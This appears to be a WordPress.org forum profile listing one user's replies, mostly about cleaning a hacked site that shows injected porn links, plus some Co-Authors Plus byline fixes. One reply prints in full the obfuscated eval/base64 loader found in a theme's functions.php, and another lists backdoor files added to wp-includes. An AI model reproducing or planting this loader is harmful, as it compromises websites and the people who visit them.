J Craig
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Site Hacked – Porn Sites AddedI will certainly keep them and thanks for all your help! Really do appreciate it!!
Forum: Fixing WordPress
In reply to: Site Hacked – Porn Sites AddedI got it. I only needed to have:
<?php
It worked and site is fixed!
Forum: Fixing WordPress
In reply to: Site Hacked – Porn Sites AddedSo leave?
<?php>?php
/* ============= Load settings ============= */I know I am doing this wrong as my site will not load now…
Forum: Fixing WordPress
In reply to: Site Hacked – Porn Sites AddedOkay did that and it did actually give me a file that was malicious:
File appears to be malicious: wp-content/themes/medicine/functions.php
Filename: wp-content/themes/medicine/functions.php
File type: Not a core, theme or plugin file.
Issue first detected: 8 secs ago.
Severity: Critical
Status New
This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “wp_function_initialize = create_function”.I am in the file and see that this is the code buyt I am not sure exactly what or how much to delete here:
‘<?php $wp_function_initialize = create_function(‘$a’,strrev(‘;)a$(lave’));$wp_function_initialize(strrev
(‘;))”=oQD9pQD7kiIwhGcf52bpR3YuVnZft2YhJGbsF2YigCdyFGdz9lYvlgCNsXKpcCdyFGdz9lYvdCKzR3cphXZf52bpR3YuVnZoYWaK0gCN0nCNAS
fK0AI7AHJg4mc1RXZylgCNoQDK0QfJoQD9lQCK0gCN0XCJkgCN0XCJkQCK0wOxQHelRHJuAHJ9AHJJkQCJkgCNsXZzxWZ9lQCJkgCN0XCJkQCJoQD7kCc
kACLxQHelRHJuICIi4yZhRHJgwyZhRHJoQ3cylmZfV2YhxGclJ3XyR3c9AHJJkQCJkQCK0welNHbl1XCJkQCJoQDgsTKwRCLxQHelRHJuICIi4yZhRHJs
cWY0RCKlNWYsBXZyl2XyR3cA1DckkQCJkQCJoQD7lSK00TPlBXe0RCK8xXKz0TPlBXe0RCKoAiZplQCJkQCK0wepkyZhRHJsAHJoIHdzlmc0NHKgYWaJk
QCJoQDK0wepkiIi0TIxQHelRHJoYiJpIiI9EyZhRHJogCImlWCJkgCNsTKxYWdiRCLiwHf8JCKlR2bsBHelBUPpEDd4VGdkwyZhRHJoQ3cpxWCJkgCNsT
K0hXZ0RCKlR2bjVGZfRjNlNXYiBUPxYWdiRSCJkgCNsXK09mYkgCImlWCJoQDK0QfJkgCNsTKoAXafR3biVGbn92bn91cp1DdvJGJJkQCK0wepkyM90TZ
wlHdkgCf8liM90TZwlHdkgCKgYWaJkgCN0XCJoQD7kCKhV3X09mYfNXa9Q3biRSCJkgCNsXKpQTP9UGc5RHJowHfpETP9UGc5RHJogCImlWCJoQD7lSK0
0TPlBXe0RCK8xXKz0TPlBXe0RCK8xXKy0TPlBXe0RCK8xXKx0TPlBXe0RCKoAiZplgCNU2csVWfJoQDJkgCN0XCJoQD7EDd4VGdk4Cck0DckkQCJoQD7V
2csVWfJkgCNsTKwRCIsEDd4VGdnFGdk4iIgIiLxQHelRHJgwSM0hXZ0dWY0RCK0NncpZ2XlNWYsBXZy9lc0NXPwRSCJkgCNsXKpkSM0hXZ0dWY0RCLwRC
KyR3cpJHdzhiJmkiIi0TIxQHelR3ZhRHJogCImlWCJoQD9lQCK0wOzpGJuAHJ9AHJJkQCK0welNHbl1XCJoQD7kCckACLzp2ZhRHJuICIi4ycqRCIsMna
nFGdkgCdzJXam9VZjFGbwVmcfJHdz1DckkQCJoQD7lSKpMnanFGdkwCckgic0NXayR3coYiJpIiI9EycqdWY0RCKoAiZplQCK0gCNsTKxYWdiRCLiwHf8
JCKlR2bsBHelBUPpEDd4VGdkwSM0hXZ0dWY0RCLzpGJsMnanFGdkgCdzlGbJkgCNsTK0hXZ0RCKlR2bjVGZfRjNlNXYiBUPxYWdiRSCJoQD7lCM90TZwl
HdkgCImlWCK0wOw0DdvJGJJoQD7ATPrUGc5RHJJoQDK0wOwRCIuJXd0VmcpIiI90Dd4VGdkgCImlWCK0wOpYWdiRCLiwHf8JCKlR2bsBHelBUPpQHelRH
JsUGc5RHJoQ3cpxWCK0QfJoQD7AHJg4mc1RXZylQCK0wepIiI90jZ1JGJoAiZplgCNsTXws1akAUPmVnYkkgCNoQD9lgCNsDckAibyVHdlJXCJoQD7lSK
4RCKu9Wa0B3bfRXZnBSPgsGJhgCImlWCK0QfJoQD9lQCK0wOwRCIuJXd0VmcJkQCK0wepkyakwCekgibvlGdw92XlRXYkBXdhgCImlWCJoQD7kCKl1Wa0
1TXxs1akkQCK0wOsFmdk0TXws1akkQCK0wOpgSehJnch1zakkQCK0wOpgSO5kzXlxWam9VZ0FGZwVXPsFmdkkQCK0wepUGdhRGc1RCKgYWaJoQD9lgCNk
QCK0QfJkgCNsTM9UGdhRGc1RSCJkgCNsXKyEjKwAjNz4TZtlGdjRCKgYWaJkgCNsTXxs1akAULpgSZtlGd9UWbpR3YkkQCK0welNHbl1XCK0wOx0TZ0FG
ZwVHJJkgCN0XCJoQD7AHJg4mc1RXZylQCJoQD7lSKn8mbnwyJnwCctVGJsgHJo42bpRHcv9FZkFWIoAiZplQCK0wOpgSehJnch1DctVGJJkgCNsXKFNFT
BZUP90zakgCImlWCK0wOpgHJo42bpRHcv9FdldGI9AyakkgCNsDM9UGdhRGc1RSCK0wOiISPmVnYkkgCNszJ9NXZtFmbfNnbvlGdw92en0DekkgCNoQDK
0QfJoQD7AHJg4mc1RXZylQCK0wepkiIulWbkFWLwdnIs01JJJVVfR1UFVVUFJ1JbJVRWJVRT9FJoIHdzlmc0NHKgYWaJoQD9lgCNsDckAibyVHdlJXCJo
QD7lSKiAHaw5ibpd2bs1Cc3JCLddSSSV1XUNVRVFVRSdyWSVkVSV0UfRCKyR3cpJHdzhCImlWCK0QfJoQD7AHJg4mc1RXZylQCK0wepkiIwhGcuMGcyxW
b4JCLddSSSV1XUNVRVFVRSdyWSVkVSV0UfRCKyR3cpJHdzhCImlWCK0gCN0XCK0wOwRCIuJXd0VmcJkgCNsHIpASKpgibp9FZld2Zvx2XyV2c191cpBiJ
mASKn4WafRWZnd2bs9lclNXdfNXangyc0NXa4V2Xu9Wa0Nmb1ZGKgwHfgkSXnETLl1Wa01ycn5Wa0RXZz1Cc3dyWFl0SP90QfRCK0V2czlGI8xHIp01Jx
0ycn5Wa0RXZz1Cc3dyWFl0SP90QfRCK0V2czlGI8xHIp01Jll2av92YfR3clR3XzNXZyBHZy92dnsVRJt0TPN0XkgCdlN3cphCImlWCK0gCNsHIpAHJoA
Haw9lbvlGdj5Wdm91ajFmYsxWYjBibvlGdj5WdmpQD7lSZzxWYm1TP9kyJwhGcf52bpR3YuVnZft2YhJGbsF2Yngyc0NXa4V2Xu9Wa0Nmb1ZGKmlmCNoQ
DK0QfK0QfK0wOsFmdkAibyVHdlJXCK0QfJoQD7kSKlR2bjRCKlR2bjVGZfRjNlNXYihCbhZXZJkgCNsTKsFmdkwiI8xHfFR0TDxHf8JCKlR2bsBHel1TK
lR2bjRCLsFmdkgCdzlGbJkgCNsXKpICf8xXRE90Q8xHfiwCbhZHJoIHdzJHdzhCImlWCK0wOpIDbhVHdjFGJokTO58FbyV3X0V2Z9wWY2RSKiISP9wWY2
RCKgYWaJoQD7kSMsFWd0NWYkgSO5kzXsJXdfRXZn1DbhZHJJoQD7kmc1RiLi8Sdy5COmRXdzpmclB3bvN2LvoDc0RHai0jMsFWd0NWYkkgCNsTayVHJuI
yLt92YuMHel52brBXdw9yL6AHd0hmI9EDbhVHdjFGJJoQD7IiNyU2NmNDO4IDZ2EWZyYmM5YGM5YGZjJWYmZTY0EDO40TamYXP09DcoBnLnJSPpJXdkkg
CNoQD7lCK5kTOfVGbpZ2XlRXYkBXdg42bpR3YuVnZK0wepU2csFmZ90TPpcSO5kzXlxWam9VZ0FGZwV3JoMHdzlGel9lbvlGdj5WdmhiZppQDK0Qf9tza
kAibyVHdlJ3Ox0zakkSK1kjM5MjNzITMx0DPwlGJoYiJpQDMxEzM2MjMxETP
+AXakgCKgYWa7kSKdJiUERUQfVEVP1URSJyWSVkVSV0UfRCQocmbvxmMwlGQsISdlICKmRnbpJHcz1DcpRyOw0zaksXKoAXafR3biVGbn92bn91cpBibv
lGdj5WdmtXKlNHbhZWP90TKnAXafR3biVGbn92bn91cpdCKzR3cphXZf52bpR3YuVnZoYWaK0Qf9tDdvJGJg4mc1RXZytTM9Q3biRSKpICdvJWZsd2bvd
mIsEWdkgic0NXayR3c8xXKiQ3bidmbpJmIsEWdkgic0NXayR3coAiZptTM9Q3biRSKpIybvhWYZJCLhVHJoIHdzlmc0NHf8liI09mYuNXbiwSY1RCKyR3
cpJHdzhCIml2OddCVOV0RB9lUFNVVfBFVUh0JbJVRWJVRT9FJA1TY1RyOw0DdvJGJ7lCKhV3X09mYfNXag42bpR3YuVnZ7lSZzxWYm1TP9kyJhV3X09mY
fNXangyc0NXa4V2Xu9Wa0Nmb1ZGKmlmCN0Xf7Q3YlpmY1NHJg4mc1RXZylQf7kSKoNmchV2ckgiblxmc0NHIsM3bwRCIsU2YhxGclJHJgwCdjVmaiV3ck
gSZjFGbwVmcfJHdzJWdzBSPgQ3YlpmY1NHJJsHIpU2csFmZg0TPhAycvBHJoAiZptTKoNmchV2ckACL0NWZqJWdzRCKz9GcpJHdzBSPgM3bwRyegkCdjV
maiV3ckACLlNWYsBXZyRCIsg2YyFWZzRCK0NncpZ2XlNWYsBXZy9lc0NHIu9Wa0Nmb1Z2epU2csFmZ90TPpcCdzJXam9VZjFGbwVmcfJHdzdCKzR3cphX
Zf52bpR3YuVnZoYWaK0Qf9tjZ1JGJg4mc1RXZytTKmVnYkwSKwEDKyh2YukyMxgicoNmLpATMoIHaj5SKzEDKyh2YoUGZvxGc4VWPpYWdiRCLtRCK0NXa
stTZzxWYmBibyVHdlJXKiISP9YWdiRCKgYWa7kyaj92ckgSZz9Gbj9Fdlt2YvNHQ9tDdk0jLmVnYksXKpADMwATMss2YvNHJoQWYlJ3X0V2aj92c9QHJo
UGbph2d7cyJ9YWdiRyOpQ3clVXclJHJss2YvNHJoUGdpJ3dfRXZrN2bztjIuxlbcR3cvhGJgoDdz9GSi0jL0NXZ1FXZyRyOi4GXw4SMvAFVUhEIpJXdkA
CVFdkI9ACdzVWdxVmck03OlNHbhZGIuJXd0Vmc7kyaj92ckgSZz9Gbj9Fdlt2YvNHQ7lSKwgDLxAXakwyaj92ckgCdjVmbu92YfRXZrN2bzBUIoAiZptT
KQNEVfx0TTxSTBVkUUN1XLN0TTxCVF5USfZUQoUGdhVmcj9Fdlt2YvNHQ9s2YvNHJ7U2csFmZg4mc1RXZyliMwlGJ9ESMwlGJoAiZpByOpkSMwlGJocmb
vxmMwlGQoAXaycmbvxGQ9IDcpRyOpQ3cvhGJoUWbh5WeiR3cvhGdldGQ9EDcpRyOddSeyVWdxdyWwRiLn8zJu01JoRXYwdyWwRSPpJXdksTXnQ3cvh2Jb
BHJ9Q3cvhGJ7kCbyVHJowmc19VZzJXYwBUPwRyOlNHbhZGIuJXd0VmcpU2csFmZ90TPpcSZ0FWZyN2X0V2aj92cngyc0NXa4V2Xu9Wa0Nmb1ZGKml2epw
mc1RCK5kTOfRXZrN2bzlnc0BibvlGdj5WdmtXKlNHbhZWP90TKnkTO58Fdlt2YvNXeyR3JoMHdzlGel9lbvlGdj5WdmhiZppQD913OmVnYkAibyVHdlJ3
OpYWdiRCLpATMoIHaj5SKzEDKyh2YukCMxgicoNmLpMTMoIHajhSZk9GbwhXZ9kiZ1JGJs0GJoQ3cpx2OlNHbhZGIuJXd0VmcpIiI90jZ1JGJoAiZptTK
mRCKlN3bsNmZ9tTKwADMwEDLmRCKkFWZyZWPuYWdiRyepkiZkgiZvVmZhgSZslGa3tzJn0jZ1JGJ7kCdzVWdxVmckwiZkgSZ0lmc3Z2Oi4GXuxFdz9Gak
AiO0N3bIJSPuQ3clVXclJHJ7IibcBjLx8CUURFSgkmc1RCIUV0Ri0DI0NXZ1FXZyRyOlNHbhZGIuJXd0VmcpYGJhgiZptTKwMDLyR3cyJXZkACLv5mcyV
GJsADOsQ3cvhGJo4WZw92aj92cmBUPmRyOddSeyVWdxdyWwRiLn8zJu01JoRXYwdyWwRSPpJXdksTXnQ3cvh2JbBHJ9Q3cvhGJ7kCbyVHJowmc19VZzJX
YwBUPwRyOlNHbhZGIuJXd0VmcpU2csFmZ90TPpciblB3brN2bzZ2JoMHdzlGel9lbvlGdj5WdmhiZptXKsJXdkgSO5kzXuVGcvt2YvNnZ5JHdg42bpR3Y
uVnZ7lSZzxWYm1TP9kyJ5kTOf5WZw92aj92cmlnc0dCKzR3cphXZf52bpR3YuVnZoYWaK0Qf9tjZ1JGJg4mc1RXZytTZzxWYmBibyVHdlJXKiISP9YWdi
RCKgYWa7U2csFmZg4mc1RXZyBSZzxWZ9tTKmRCKlN3bsNmZ9tTKwADMwEDLmRCKkFWZyZWPuYWdiRyepkiZkgiZvVmZhgSZslGa3tXKmRCKgYWa7kyJyd
CLsJXdkgiblB3bmBUPmRyOncSPmVnYksTZzxWYmBibyVHdlJXKlNHbhZWP90TKn4WZw9mZngyc0NXa4V2Xu9Wa0Nmb1ZGKml2epwmc1RCK5kTOf5WZw9m
Z5JHdg42bpR3YuVnZ7lSZzxWYm1TP9kyJ5kTOf5WZw9mZ5JHdngyc0NXa4V2Xu9Wa0Nmb1ZGKmlmCN0Xf7YWdiRCIuJXd0Vmc7U2csFmZg4mc1RXZyliI
i0TPmVnYkgCIml2OpMmbpRCLncCKlR2bsBXbpBUPmVnYksTKsJXdkgSZslmZA1zYulGJ7U2csFmZg4mc1RXZylSZzxWYm1TP9kyJlxWamdCKzR3cphXZf
52bpR3YuVnZoYWa7lCbyVHJokTO58VZslmZ5JHdg42bpR3YuVnZ7lSZzxWYm1TP9kyJ5kTOfVGbpZWeyR3JoMHdzlGel9lbvlGdj5WdmhiZppQD913O0x
WdzVmckAibyVHdlJ3OlNHbhZGIuJXd0VmcpIiI90DdsV3clJHJoAiZptTKoNGJoU2cvx2Yfxmc1N2Opg2YkgCIjVGel9FbyV3Yg0DI0xWdzVmcksTKwAC
LSVERBVESfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1N2OpUDIsQVVPVUTJR1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjtTKxACLSVkRT5UQSRlTSVFV
FJ1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjtTKsJXdkwCTSV1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjtTKoACdp5Wafxmc1NGI9ACajRyOlNHbh
ZGIuJXd0VmcpU2csFmZ90TPpcCdp5Wafxmc1N2JoMHdzlGel9lbvlGdj5WdmhiZptXKsJXdkgSO5kzXsJXdjlnc0BibvlGdj5WdmtXKlNHbhZWP90TKnk
TO58FbyV3Y5JHdngyc0NXa4V2Xu9Wa0Nmb1ZGKmlmCN0Xf7cyJg4mc1RXZytDduVGdu92YkAibyVHdlJXKlNHbhZWP9ECduVGdu92YkgiZptTKsJXdkgS
O5kzX0V2aj92c5JHdA1DduVGdu92YksDduVGdu92YkAibyVHdlJXKlNHbhZWP9ECduVGdu92YkgiZptTKsJXdkgSO5kzXuVGcvt2YvNnZ5JHdA1DduVGd
u92YksDduVGdu92YkAibyVHdlJXKlNHbhZWP9ECduVGdu92YkgiZptTKsJXdkgSO5kzXuVGcvZWeyRHQ9QnblRnbvNGJ7QnblRnbvNGJg4mc1RXZylSZz
xWYm1TPhQnblRnbvNGJoYWa7kCbyVHJokTO58VZslmZ5JHdA1DduVGdu92YksDduVGdu92YkAibyVHdlJXKlNHbhZWP9ECduVGdu92YkgiZptTKsJXdkg
SO5kzXsJXdjlnc0BUP05WZ052bjRyOiISP05WZ052bjRyepwmc1RCK5kTOfxmc19FdldGIu9Wa0Nmb1Z2epU2csFmZ90TPpcSO5kzXsJXdfRXZndCKzR3
cphXZf52bpR3YuVnZoYWa”(edoced_46esab(lave’));?><?php
/* ============= Load settings ============= */’Forum: Fixing WordPress
In reply to: Site Hacked – Porn Sites AddedI removed those files, installed and went through countless steps to secure the site via iThemes and refreshed site and still has the porn links…..
Forum: Fixing WordPress
In reply to: Site Hacked – Porn Sites AddedThank you! Will remove files and install iThemes Security!
Forum: Fixing WordPress
In reply to: Site Hacked – Porn Sites AddedI installed the Sucuri WordPress Security plugin and it listed 6 files added but I am not sure what to look for:
Core integrity (6 files) Hide files
Changes in the integrity of your core files were detected. There are files that were added, modified, and/or removed in the core directories /<root>, /wp-admin and/or /wp-includes. You may want to check each file to determine if they were infected with malicious code.
Select Status File Size File Path
Added ~0.00B .wpcli
Added ~46.00B wp-includes/images/crystal/.htaccess
Added ~50.69K wp-includes/images/crystal/settings.pl
Added ~30.42K wp-includes/images/crystal/vars.php
Added ~449.00B wp-includes/images/wlw/credits.php
Added ~356.00B wp-includes/images/wlw/options.phpThe action to restore the content of a file will only work with files that were modified or removed, for files that were added you must either remove or mark as fixed. Files marked as fixed will always be ignored from the integrity checks, an attacker can use this option to hide a malicious file, so always check what files are being ignored.
Forum: Plugins
In reply to: [Fancier Author Box by ThematoSoup] Multi- AuthorDo I need the premium version to have multiple author boxes on a post?
Forum: Plugins
In reply to: [Co-Authors Plus] "Posted by" has disappearedThe date isn’t clickable as it previously was, but this not a major concern to me, so thank you!
Forum: Plugins
In reply to: [Co-Authors Plus] "Posted by" has disappearedThis first code you provided wrapped actually worked in my single.php!
<?php if ( function_exists( ‘coauthors_posts_links’ ) ) {
coauthors_posts_links(null,null,’Posted by ‘);
}
else {
echo ‘Posted by’;
the_author_posts_link();
}
echo ‘ on ‘;
the_time( get_option( ‘date_format’ ) ); ?>Forum: Plugins
In reply to: [Co-Authors Plus] "Posted by" has disappearedThis is the exact code from that part of my functions.php:
<div class=”post-author”><span class=”post-author”><?php if ( get_post_meta(get_the_ID(), ‘np_author’, ‘true’) !=” ): echo get_post_meta(get_the_ID(), ‘np_author’, ‘true’); else: the_author_posts_link(); endif; ?> | </span><span class=”post-date”>“><?php the_time(‘F j, Y’); ?></span></div>
<?phpForum: Plugins
In reply to: [Co-Authors Plus] "Posted by" has disappearedThat code you provided did not work. It actually shows the code itself on the byline now.
Forum: Plugins
In reply to: [Co-Authors Plus] "Posted by" has disappearedI removed this code <?php newspress_author_meta(); ?>
and replaced it with the coauthor code.Forum: Plugins
In reply to: [Co-Authors Plus] "Posted by" has disappearedMy date after the author names has also disappeared. Wondering how to make this reappear as well.
Thanks!
Forum: Plugins
In reply to: [Co-Authors Plus] "Posted by" has disappearedI need the “posted by” to reappear as well. Any help?
Here is my code being used:<?php if ( function_exists( ‘coauthors_posts_links’ ) ) { coauthors_posts_links(); } else { the_author_posts_link(); } ?>
I also only have one author box at the bottom of my post.
http://anmnews.com/kentucky-governor-beshear-opens-obamacare-store-front-in-lexington/